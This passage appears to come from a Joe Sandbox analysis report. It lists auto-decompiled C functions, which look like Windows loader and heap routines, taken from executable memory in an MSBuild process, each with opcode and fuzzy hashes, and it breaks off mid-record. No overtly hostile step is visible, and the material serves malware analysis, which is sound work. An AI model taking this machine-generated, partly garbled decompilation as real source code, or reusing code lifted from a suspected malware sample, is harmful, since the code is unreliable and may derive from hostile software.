                                            							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                            						}
                                            						if(( *_t21 & 0x00000020) != 0) {
                                            							_t56 = _t46;
                                            							if(_t46 == 0) {
                                            								_t46 = 0xfe5c80;
                                            							}
                                            							_push(_t46);
                                            							_push( &_v12);
                                            							_t24 = E0103F6E0(_t36, 0, _t46, _t56);
                                            							_push(_a4);
                                            							_t38 = _t24;
                                            							_push( &_v28);
                                            							_t21 = E0103F6E0(_t38, 0, _t46, _t56);
                                            							if(_t38 != 0) {
                                            								if(_t21 != 0) {
                                            									E01087016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                            									L01022400( &_v52);
                                            								}
                                            								_t21 = L01022400( &_v28);
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t21;
                                            			}




















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f849aeaf932d6e7130c6b5b61b152bcf5f26344faeda80d3cb53a92e6ffea76a
                                            • Instruction ID: 2cfdfb69de803a36575213ccdc141235924aafe6c33507f13917d7c2045f1018
                                            • Opcode Fuzzy Hash: f849aeaf932d6e7130c6b5b61b152bcf5f26344faeda80d3cb53a92e6ffea76a
                                            • Instruction Fuzzy Hash: 7721F5729087459BD311FF69C944FABBBECAFA1740F050496FAC0C7261EB35D548C6A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E010D070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                            				char _v8;
                                            				intOrPtr _v11;
                                            				signed int _v12;
                                            				intOrPtr _v15;
                                            				signed int _v16;
                                            				intOrPtr _v28;
                                            				void* __ebx;
                                            				char* _t32;
                                            				signed int* _t38;
                                            				signed int _t60;
                                            
                                            				_t38 = __ecx;
                                            				_v16 = __edx;
                                            				_t60 = E010D07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                            				if(_t60 != 0) {
                                            					_t7 = _t38 + 0x38; // 0x29cd5903
                                            					_push( *_t7);
                                            					_t9 = _t38 + 0x34; // 0x6adeeb00
                                            					_push( *_t9);
                                            					_v12 = _a8 << 0xc;
                                            					_t11 = _t38 + 4; // 0x5de58b5b
                                            					_push(0x4000);
                                            					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                            					E010CAFDE( &_v8,  &_v12);
                                            					E010D1293(_t38, _v28, _t60);
                                            					if(E01027D50() == 0) {
                                            						_t32 = 0x7ffe0380;
                                            					} else {
                                            						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            					}
                                            					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                            						E010C14FB(_t38,  *_t21, _v11, _v15, 0xd);
                                            					}
                                            				}
                                            				return  ~_t60;
                                            			}














                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                            • Instruction ID: 40412c53b588fda5c357dce8952da86966d1cfc04cb27ac22e1f43d6e27a14aa
                                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                            • Instruction Fuzzy Hash: C521DE36604304AFD705DF68C880AAABBE5FFD4650F048669F9998B385DA30D909CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E01087794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _t21;
                                            				void* _t24;
                                            				intOrPtr _t25;
                                            				void* _t36;
                                            				short _t39;
                                            				signed char* _t42;
                                            				unsigned int _t46;
                                            				void* _t50;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t21 =  *0x10f7b9c; // 0x0
                                            				_t46 = _a8;
                                            				_v12 = __edx;
                                            				_v8 = __ecx;
                                            				_t4 = _t46 + 0x2e; // 0x2e
                                            				_t36 = _t4;
                                            				_t24 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                            				_t50 = _t24;
                                            				if(_t50 != 0) {
                                            					_t25 = _a4;
                                            					if(_t25 == 5) {
                                            						L3:
                                            						_t39 = 0x14b1;
                                            					} else {
                                            						_t39 = 0x14b0;
                                            						if(_t25 == 6) {
                                            							goto L3;
                                            						}
                                            					}
                                            					 *((short*)(_t50 + 6)) = _t39;
                                            					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                            					_t11 = _t50 + 0x2c; // 0x2c
                                            					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                            					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                            					E0104F3E0(_t11, _a12, _t46);
                                            					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                            					if(E01027D50() == 0) {
                                            						_t42 = 0x7ffe0384;
                                            					} else {
                                            						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            					}
                                            					_push(_t50);
                                            					_t19 = _t36 - 0x20; // 0xe
                                            					_push(0x403);
                                            					_push( *_t42 & 0x000000ff);
                                            					E01049AE0();
                                            					_t24 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                            				}
                                            				return _t24;
                                            			}














                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03ec2f69f7bd983c9df3f7207ac52981b32da6903dc638cb014ec2c36fa645ce
                                            • Instruction ID: 233429c9a54382e8060ba8d648b3e3c394325ee057ec14d73f4c0ace19da9ddd
                                            • Opcode Fuzzy Hash: 03ec2f69f7bd983c9df3f7207ac52981b32da6903dc638cb014ec2c36fa645ce
                                            • Instruction Fuzzy Hash: 9C219F72504604EBC725EF69D880EABBBB8FF48740F10456DE68AC7750D634E900CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E0102AE73(intOrPtr __ecx, void* __edx) {
                                            				intOrPtr _v8;
                                            				void* _t19;
                                            				char* _t22;
                                            				signed char* _t24;
                                            				intOrPtr _t25;
                                            				intOrPtr _t27;
                                            				void* _t31;
                                            				intOrPtr _t36;
                                            				char* _t38;
                                            				signed char* _t42;
                                            
                                            				_push(__ecx);
                                            				_t31 = __edx;
                                            				_v8 = __ecx;
                                            				_t19 = E01027D50();
                                            				_t38 = 0x7ffe0384;
                                            				if(_t19 != 0) {
                                            					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            				} else {
                                            					_t22 = 0x7ffe0384;
                                            				}
                                            				_t42 = 0x7ffe0385;
                                            				if( *_t22 != 0) {
                                            					if(E01027D50() == 0) {
                                            						_t24 = 0x7ffe0385;
                                            					} else {
                                            						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            					}
                                            					if(( *_t24 & 0x00000010) != 0) {
                                            						goto L17;
                                            					} else {
                                            						goto L3;
                                            					}
                                            				} else {
                                            					L3:
                                            					_t27 = E01027D50();
                                            					if(_t27 != 0) {
                                            						_t27 =  *[fs:0x30];
                                            						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                            					}
                                            					if( *_t38 != 0) {
                                            						_t27 =  *[fs:0x30];
                                            						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                            							goto L5;
                                            						}
                                            						_t27 = E01027D50();
                                            						if(_t27 != 0) {
                                            							_t27 =  *[fs:0x30];
                                            							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                            						}
                                            						if(( *_t42 & 0x00000020) != 0) {
                                            							L17:
                                            							_t25 = _v8;
                                            							_t36 = 0;
                                            							if(_t25 != 0) {
                                            								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                            							}
                                            							_t27 = E01087794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                            						}
                                            						goto L5;
                                            					} else {
                                            						L5:
                                            						return _t27;
                                            					}
                                            				}
                                            			}














                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                            • Instruction ID: c6d7a586963dcc56504ab287397d58ec62b945ae460813237cc480b70d508b66
                                            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                            • Instruction Fuzzy Hash: 2F21F672B01691DFEB26AB2CC944B657BE8FF54740F1900E1DD848B792EB34DC41C6A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0103FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				intOrPtr _v8;
                                            				void* _t19;
                                            				intOrPtr _t29;
                                            				intOrPtr _t32;
                                            				intOrPtr _t35;
                                            				intOrPtr _t37;
                                            				intOrPtr* _t40;
                                            
                                            				_t35 = __edx;
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t37 = 0;
                                            				_v8 = __edx;
                                            				_t29 = __ecx;
                                            				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                            					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                            					L3:
                                            					_t19 = _a4 - 4;
                                            					if(_t19 != 0) {
                                            						if(_t19 != 1) {
                                            							L7:
                                            							return _t37;
                                            						}
                                            						if(_t35 == 0) {
                                            							L11:
                                            							_t37 = 0xc000000d;
                                            							goto L7;
                                            						}
                                            						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                            							_t35 = _v8;
                                            						}
                                            						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                            						goto L7;
                                            					}
                                            					if(_t29 == 0) {
                                            						goto L11;
                                            					}
                                            					_t32 =  *_t40;
                                            					if(_t32 != 0) {
                                            						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                            						E010176E2( *_t40);
                                            					}
                                            					 *_t40 = _t29;
                                            					goto L7;
                                            				}
                                            				_t40 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                            				if(_t40 == 0) {
                                            					_t37 = 0xc0000017;
                                            					goto L7;
                                            				}
                                            				_t35 = _v8;
                                            				 *_t40 = 0;
                                            				 *((intOrPtr*)(_t40 + 4)) = 0;
                                            				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                            				goto L3;
                                            			}











                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                            • Instruction ID: 954f9f27e0d7c378fe8cf0d9e14c4950688c064a813c431b9e5b79d9df9837f6
                                            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                            • Instruction Fuzzy Hash: E3217C72A00642DFD731DF4DC648A66B7E9EBD4B10F2485AEE98687611D7349C00CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 54%
                                            			E0103B390(void* __ecx, intOrPtr _a4) {
                                            				signed int _v8;
                                            				signed char _t12;
                                            				signed int _t16;
                                            				signed int _t21;
                                            				void* _t28;
                                            				signed int _t30;
                                            				signed int _t36;
                                            				signed int _t41;
                                            
                                            				_push(__ecx);
                                            				_t41 = _a4 + 0xffffffb8;
                                            				E01022280(_t12, 0x10f8608);
                                            				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                            				asm("sbb edi, edi");
                                            				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                            				_v8 = _t36;
                                            				asm("lock cmpxchg [ebx], ecx");
                                            				_t30 = 1;
                                            				if(1 != 1) {
                                            					while(1) {
                                            						_t21 = _t30 & 0x00000006;
                                            						_t16 = _t30;
                                            						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                            						asm("lock cmpxchg [edi], esi");
                                            						if(_t16 == _t30) {
                                            							break;
                                            						}
                                            						_t30 = _t16;
                                            					}
                                            					_t36 = _v8;
                                            					if(_t21 == 2) {
                                            						_t16 = E010400C2(0x10f8608, 0, _t28);
                                            					}
                                            				}
                                            				if(_t36 != 0) {
                                            					_t16 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                            				}
                                            				return _t16;
                                            			}












                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1014fb3e0e8f0db1f322f01cf3d61a6333ddb945bb0f1be604723b1b18bc42ab
                                            • Instruction ID: a7766bf9a2908a0bdf0a56687632fa483ba3d2fd9260e7d32c5aaf579f05053e
                                            • Opcode Fuzzy Hash: 1014fb3e0e8f0db1f322f01cf3d61a6333ddb945bb0f1be604723b1b18bc42ab
                                            • Instruction Fuzzy Hash: BF116B337051209BCB198A18CD81AAF769AEBD9330B28817DEE96D7780C9319C02C795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E01009240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr _t33;
                                            				intOrPtr _t37;
                                            				intOrPtr _t41;
                                            				intOrPtr* _t46;
                                            				void* _t48;
                                            				intOrPtr _t50;
                                            				intOrPtr* _t60;
                                            				void* _t61;
                                            				intOrPtr _t62;
                                            				intOrPtr _t65;
                                            				void* _t66;
                                            				void* _t68;
                                            
                                            				_push(0xc);
                                            				_push(0x10df708);
                                            				E0105D08C(__ebx, __edi, __esi);
                                            				_t65 = __ecx;
                                            				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                            				if( *(__ecx + 0x24) != 0) {
                                            					_push( *(__ecx + 0x24));
                                            					E010495D0();
                                            					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                            				}
                                            				L6();
                                            				L6();
                                            				_push( *((intOrPtr*)(_t65 + 0x28)));
                                            				E010495D0();
                                            				_t33 =  *0x10f84c4; // 0x0
                                            				L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                            				_t37 =  *0x10f84c4; // 0x0
                                            				L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                            				_t41 =  *0x10f84c4; // 0x0
                                            				E01022280(L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x10f86b4);
                                            				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                            				_t46 = _t65 + 0xe8;
                                            				_t62 =  *_t46;
                                            				_t60 =  *((intOrPtr*)(_t46 + 4));
                                            				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                            					_t61 = 3;
                                            					asm("int 0x29");
                                            					_push(_t65);
                                            					_t66 = _t61;
                                            					_t23 = _t66 + 0x14; // 0x8df8084c
                                            					_push( *_t23);
                                            					E010495D0();
                                            					_t24 = _t66 + 0x10; // 0x89e04d8b
                                            					_push( *_t24);
                                            					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                            					_t48 = E010495D0();
                                            					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                            					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                            					return _t48;
                                            				} else {
                                            					 *_t60 = _t62;
                                            					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                            					 *(_t68 - 4) = 0xfffffffe;
                                            					E01009325();
                                            					_t50 =  *0x10f84c4; // 0x0
                                            					return E0105D0D1(L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                            				}
                                            			}
















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5cc8d7d423c69fdae13170d81aad6115fc982350608f5119b059227a85f28fd7
                                            • Instruction ID: 60c6126432fd9d75ccea020553f61ef38837db5696b4824618b47a9c922ce5ca
                                            • Opcode Fuzzy Hash: 5cc8d7d423c69fdae13170d81aad6115fc982350608f5119b059227a85f28fd7
                                            • Instruction Fuzzy Hash: 10213971041601DFC762EF68CA40F9AB7F9BF28708F14856DE18986AA2CB35E941CB44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E01094257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr* _t27;
                                            				intOrPtr* _t30;
                                            				intOrPtr* _t31;
                                            				intOrPtr _t33;
                                            				intOrPtr* _t34;
                                            				intOrPtr* _t35;
                                            				void* _t37;
                                            				void* _t38;
                                            				void* _t39;
                                            				void* _t43;
                                            
                                            				_t39 = __eflags;
                                            				_t35 = __edi;
                                            				_push(8);
                                            				_push(0x10e08d0);
                                            				E0105D08C(__ebx, __edi, __esi);
                                            				_t37 = __ecx;
                                            				E010941E8(__ebx, __edi, __ecx, _t39);
                                            				E0101EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                            				_t18 = _t37 + 8;
                                            				_t33 =  *_t18;
                                            				_t27 =  *((intOrPtr*)(_t18 + 4));
                                            				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                            					L8:
                                            					_push(3);
                                            					asm("int 0x29");
                                            				} else {
                                            					 *_t27 = _t33;
                                            					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                            					_t35 = 0x10f87e4;
                                            					_t18 =  *0x10f87e0; // 0x0
                                            					while(_t18 != 0) {
                                            						_t43 = _t18 -  *0x10f5cd0; // 0xffffffff
                                            						if(_t43 >= 0) {
                                            							_t31 =  *0x10f87e4; // 0x0
                                            							_t18 =  *_t31;
                                            							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                            								goto L8;
                                            							} else {
                                            								 *0x10f87e4 = _t18;
                                            								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                            								L01007055(_t31 + 0xfffffff8);
                                            								_t24 =  *0x10f87e0; // 0x0
                                            								_t18 = _t24 - 1;
                                            								 *0x10f87e0 = _t18;
                                            								continue;
                                            							}
                                            						}
                                            						goto L9;
                                            					}
                                            				}
                                            				L9:
                                            				__eflags =  *0x10f5cd0;
                                            				if( *0x10f5cd0 <= 0) {
                                            					L01007055(_t37);
                                            				} else {
                                            					_t30 = _t37 + 8;
                                            					_t34 =  *0x10f87e8; // 0x0
                                            					__eflags =  *_t34 - _t35;
                                            					if( *_t34 != _t35) {
                                            						goto L8;
                                            					} else {
                                            						 *_t30 = _t35;
                                            						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                            						 *_t34 = _t30;
                                            						 *0x10f87e8 = _t30;
                                            						 *0x10f87e0 = _t18 + 1;
                                            					}
                                            				}
                                            				 *(_t38 - 4) = 0xfffffffe;
                                            				return E0105D0D1(L01094320());
                                            			}
















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bdfff31e24e8b173840bc34c7b31592dbe91d57c3ffce21b60a86a82043c47f4
                                            • Instruction ID: d99d1e248085cf9604e4d21ceff25ef526de60820cd1d2f57ab29bb0f53f7da1
                                            • Opcode Fuzzy Hash: bdfff31e24e8b173840bc34c7b31592dbe91d57c3ffce21b60a86a82043c47f4
                                            • Instruction Fuzzy Hash: B6216870A00702CFCB65DF68D221694BBE1FB45314B50C2EED1D5CB699D73AD452DB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 25%
                                            			E01032397(intOrPtr _a4) {
                                            				void* __ebx;
                                            				void* __ecx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed int _t11;
                                            				void* _t19;
                                            				void* _t25;
                                            				void* _t26;
                                            				intOrPtr _t27;
                                            				void* _t28;
                                            				void* _t29;
                                            
                                            				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                            				if( *0x10f848c != 0) {
                                            					L0102FAD0(0x10f8610);
                                            					if( *0x10f848c == 0) {
                                            						E0102FA00(0x10f8610, _t19, _t27, 0x10f8610);
                                            						goto L1;
                                            					} else {
                                            						_push(0);
                                            						_push(_a4);
                                            						_t26 = 4;
                                            						_t29 = E01032581(0x10f8610, 0xfe50a0, _t26, _t27, _t28);
                                            						E0102FA00(0x10f8610, 0xfe50a0, _t27, 0x10f8610);
                                            					}
                                            				} else {
                                            					L1:
                                            					_t11 =  *0x10f8614; // 0x0
                                            					if(_t11 == 0) {
                                            						_t11 = E01044886(0xfe1088, 1, 0x10f8614);
                                            					}
                                            					_push(0);
                                            					_push(_a4);
                                            					_t25 = 4;
                                            					_t29 = E01032581(0x10f8610, (_t11 << 4) + 0xfe5070, _t25, _t27, _t28);
                                            				}
                                            				if(_t29 != 0) {
                                            					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                            					 *((char*)(_t29 + 0x40)) = 0;
                                            				}
                                            				return _t29;
                                            			}
















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d9e0ee161f559ecfc9220d9f6a6f834dd7472a30bdd79894d5aad343d5bfcc88
                                            • Instruction ID: db351ce9a100b286dbd1af9d2a8e4699c26fac050ac4f4ce3ae32a50ef679a77
                                            • Opcode Fuzzy Hash: d9e0ee161f559ecfc9220d9f6a6f834dd7472a30bdd79894d5aad343d5bfcc88
                                            • Instruction Fuzzy Hash: EB112B7270075267E730A62E9C85B99B6DCEBE0F50F14C46EF7C297581CA74E8408754
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E010846A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                            				signed short* _v8;
                                            				unsigned int _v12;
                                            				intOrPtr _v16;
                                            				signed int _t22;
                                            				signed char _t23;
                                            				short _t32;
                                            				void* _t38;
                                            				char* _t40;
                                            
                                            				_v12 = __edx;
                                            				_t29 = 0;
                                            				_v8 = __ecx;
                                            				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                            				_t38 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                            				if(_t38 != 0) {
                                            					_t40 = _a4;
                                            					 *_t40 = 1;
                                            					E0104F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                            					_t22 = _v12 >> 1;
                                            					_t32 = 0x2e;
                                            					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                            					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                            					_t23 = E0103D268(_t38, 1);
                                            					asm("sbb al, al");
                                            					 *_t40 =  ~_t23 + 1;
                                            					L010277F0(_v16, 0, _t38);
                                            				} else {
                                            					 *_a4 = 0;
                                            					_t29 = 0xc0000017;
                                            				}
                                            				return _t29;
                                            			}












                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                            • Instruction ID: 824e178c20e7a245bf11662a7ca220b891b529ccadfa580955020839b5b25216
                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                            • Instruction Fuzzy Hash: 1C112572504209BBC701AF5CD8809BEB7B9EFA9300F1080AAF984C7350DA318D51C7A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 42%
                                            			E0100C962(char __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t19;
                                            				char _t22;
                                            				void* _t26;
                                            				void* _t27;
                                            				char _t32;
                                            				char _t34;
                                            				void* _t35;
                                            				void* _t37;
                                            				intOrPtr* _t38;
                                            				signed int _t39;
                                            
                                            				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                            				_v8 =  *0x10fd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                            				_t34 = __ecx;
                                            				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                            					_t26 = 0;
                                            					E0101EEF0(0x10f70a0);
                                            					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                            					if(E0108F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                            						L9:
                                            						E0101EB70(_t29, 0x10f70a0);
                                            						_t19 = _t26;
                                            						L2:
                                            						_pop(_t35);
                                            						_pop(_t37);
                                            						_pop(_t27);
                                            						return E0104B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                            					}
                                            					_t29 = _t34;
                                            					_t26 = E0108F1FC(_t34, _t32);
                                            					if(_t26 < 0) {
                                            						goto L9;
                                            					}
                                            					_t38 =  *0x10f70c0; // 0x0
                                            					while(_t38 != 0x10f70c0) {
                                            						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                            						_t38 =  *_t38;
                                            						_v12 = _t22;
                                            						if(_t22 != 0) {
                                            							_t29 = _t22;
                                            							 *0x10fb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                            							_v12();
                                            						}
                                            					}
                                            					goto L9;
                                            				}
                                            				_t19 = 0;
                                            				goto L2;
                                            			}



















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5bbd3a0ab9a3970a6debe2beb084bb7da2c862f756e95ac245e7b44f4496033d
                                            • Instruction ID: bd3ac97e6d1707dc77c5c0204fbdd7791d64d575299598a8c5019cc4b8d24bd7
                                            • Opcode Fuzzy Hash: 5bbd3a0ab9a3970a6debe2beb084bb7da2c862f756e95ac245e7b44f4496033d
